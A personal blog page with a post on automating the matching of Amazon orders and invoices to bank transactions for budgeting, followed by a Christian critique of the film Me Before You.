Tracking and categorizing financial transactions can be tedious, especially when it comes to Amazon orders. With Amazon’s new data policies, it’s harder than ever to retrieve detailed purchase information in a usable format. Amazon is so broad that a credit card charge could be for a digital or physical product, a whole foods purchase. The purchases themselves are complicated, with charges connected to shipments and with gift card transactions involved. You can request all your data, but it’s in a terrible format, basically a big flattened table that doesn’t correlate order_id to invoiced transactions.

I have a well oiled set of code that downloads all my transactions from every bank, credit card, etc, uses machine learning (naive bayes) to categorize transactions and upload them to a google sheet where I can balance everything, check categories and add additional details. My code then downloads 25 years of transactions (every penny I’ve ever spent) into postgres (both locally and cloud based) that allows me to use R and tableau to do a bunch of analysis. It’s a hobby to sit down and build a google slide deck filled with data on where our money is going and how our investments are doing.

Our orders are going up, and it’s time for automation.

This system has evolved over time and works really well. Here, I’m wanted to share how I get amazon transactions to match my bank charges so I can list the products I’m buying.

Step 1: get your amazon order data into a database

This is tricky — google privacy central (the link has changed a couple times in the last year or so) and you can request a zip file of your data. There are two parts to this: request your data and then wait for an email with a link to download it later. It’s surprising that it could take days for what is surely a fully automated process, but it generally takes hours.

Eventually, you get your Orders.zip which has:

├── Digital-Ordering.1
│   ├── Digital Items.csv
...
├── Retail.CustomerReturns.1.1
│   └── Retail.CustomerReturns.1.1.csv
├── Retail.OrderHistory.1
│   └── Retail.OrderHistory.1.csv
├── Retail.OrderHistory.2
│   └── Retail.OrderHistory.2.csv

The file we want is Retail.OrderHistory.1.csv. You can get that into a database with this code:

Step 2: Get Your Amazon invoices data into the Database (via scraping)

That took a lot of work to get right, and that code works well for about 80% of my transactions, but some required matching actual invoice amounts with order_id. To make that work, you have to scrape your orders page, click on the order and download the detail. I’ve written a lot of code that does that before, but it’s a pain to get right (Google Chrome tools is a game-changer for that). Fortunately, I found this code that does exactly that: https://github.com/dcwangmit01/amazon-invoice-downloader

The Amazon Invoice Downloader is a Python script that automates the process of downloading invoices for Amazon purchases using the Playwright library. It logs into an Amazon account with provided credentials, navigates to the “Returns & Orders” section, and retrieves invoices within a specified date range or year. The invoices are saved as PDF files in a local directory, with filenames formatted to include the order date, total amount, and order ID. The script mimics human behavior to avoid detection and skips downloading invoices that already exist.

You get all the invoices, but most helpful is the resultant csv:

cat downloads/2024/transactions-2024.csv
Date,Amount,Card Type,Last 4 Digits,Order ID,Order Type
2024-01-03,7.57,Visa,1111,114-2554918-8507414,amazon
2024-01-03,5.60,Visa,1111,114-7295770-5362641,amazon

You can use this code to get this into the database:

And finally, a script that compares the database to my google sheet and adds the match to uncategorized transactions

This was a bit tricky, but all works well now. Hopefully this saves you some time. Please reach out if you have any questions and happy analysis.

January 21, 2025 (updated January 21, 2025) By Tim Booher 0 Comments

Uncategorized

The most non-Christian movie?

I’m a Christian and that defines my worldview and ethics. And I love art. Like Keats, I believe that good art is both beautiful and useful: Beethoven’s symphonies inspire awe; Dostoevsky’s The Brothers Karamazov explores themes of suffering, faith, and free will; It’s a Wonderful Life inspires hope and encourages selflessness; Shakespeare’s plays blend humor with profound insight.

These are all as good as they are beautiful. Since Christianity is truth and truth is beauty, all good art should flow from a common place.

One of the wrinkles of Christianity is that Christian ideas are baked into western thought. Much of what appears to be anti-Christian is just a mis-ordering of or mis-placed emphasis on Christian ideas. Woke? That’s myopic focus on one part of original sin without grace. Porn? A self-absorbed misappropriation of God’s gift of sex. Bad things don’t make a bad or evil movie. CS Lewis told us that storytelling should awaken us to higher truths, even when it reflects the brokenness of the world.

You could divide the world into two camps: good and bad. Bad can in turn be disordered or bad can be non-Christian. Framed this way, what is the least Christian movie? Would such a movie be filled with violence, sex and debauchery: The Wolf of Wall Street, Game of Thrones? Would it be a dark, satanic: The Exorcist, Heathers, Rosemary’s Baby?

To get a sense of what is non-Christian, examine the world before the gospels. The roman world gave us virtue and honor, but nothing like equality before the law, the concept that the last shall be first, or the dignity of all souls. Aristotle supported slavery, unwanted infants (eg. girls or disabled children) were routinely left to die, Athenian democracy excluded women entirely. Most of all, avenging an insult or wrong was a moral duty. Roman society prized virtus (manly courage) and honor over forgiveness or humility.

So a non-christian movie isn’t anymore filled with bad things than good. The real question is what ethics and what ideas guide them? A common theme is that non-Christian ideas deny the equal value and immortality of the soul.

The movie Me Before You presents itself as a romantic drama about love and loss. The movie is filled with beautiful people in beautiful places with sunny skies. But the message is pitch black dark and hopeless. Beneath the beauty is a worldview that undermines the sanctity of life and the transformative power of suffering. It’s a distinctively non-christian movie.

St. Augustine teaches us that every human being is created in the image of God (Genesis 1:27). This truth establishes the intrinsic value of all human life, regardless of physical condition or ability. In Me Before You, Will Traynor’s choice of assisted suicide implies that his life as a quadriplegic is less valuable than his life before the accident. This perspective contradicts the Christian belief that human worth is not determined by physical abilities or financial circumstances but by our relationship to God.

Augustine would remind us that despair arises when we lose sight of our Creator. Rather than seeking solace in love, community, or faith, Will’s decision reflects a self-centered despair—a refusal to trust that God can bring purpose and meaning even in suffering.

Thomas Aquinas famously argued that God allows suffering to bring about a greater good. In Will’s case, his condition could have been an opportunity to grow in humility, patience, and reliance on others—a path that can lead to sanctification. Louisa’s care for Will could have been a testament to sacrificial love, mirroring Christ’s self-giving love on the cross.

Instead, the film chooses to glorify Will’s autonomy supported by his riches and spontaneity, portraying his decision as noble and selfless. This was set against the backdrop of patrick, the loyal and disciplined long time boyfriend. Aquinas would see this as a failure to recognize the redemptive power of suffering, which, when embraced with faith, can lead to spiritual growth and even joy (Romans 5:3-5).

Søren Kierkegaard describes love as a commitment rooted in selflessness and sacrifice. True love does not seek its own way but rather the good of the other (1 Corinthians 13:4-7). In Me Before You, Will’s decision to end his life is framed as an act of love for Louisa, freeing her to live a life unburdened by his condition and with a pile of cash.

Kierkegaard would argue that true love requires embracing the other person, even in their brokenness. By rejecting life, Will also rejects the possibility of a deeper, sacrificial relationship with Louisa—one that could have transformed both of their lives.

Nothing defines unchristian more than nihilism and materialism. C.S. Lewis reminds us that this life is not all there is. In The Problem of Pain, he writes that God “whispers to us in our pleasures, speaks in our conscience, but shouts in our pains: it is His megaphone to rouse a deaf world.” Pain and suffering, while difficult, are often avenues through which God draws us closer to Himself.

Me Before You rejects this eternal perspective, focusing instead on immediate relief from suffering through assisted suicide. The Christian faith offers a vision of life beyond the grave, where every tear will be wiped away (Revelation 21:4).

Movies are there to make money, but they have the chance to make us better. Me Before You had the potential to tell a powerful story about resilience, faith, and the transformative power of love, love that transcends class divisions and embraces suffering as a means to demonstrate and receive love. Instead, it glorifies despair and autonomy at the expense of hope and community. From the perspectives of Augustine, Aquinas, Kierkegaard, and Lewis, the film’s message is not just misguided—it is profoundly un-Christian.

True love, dignity, and hope are found not in rejecting life but in embracing it, even with all its challenges. As Christians, we are called to uphold the sanctity of life, support those who are suffering, and trust in the redemptive power of God’s plan. Me Before You gets it wrong, but its flaws remind us of the beauty and value of a worldview centered on Christ.

January 3, 2025 (updated January 8, 2025) By Tim Booher 3 Comments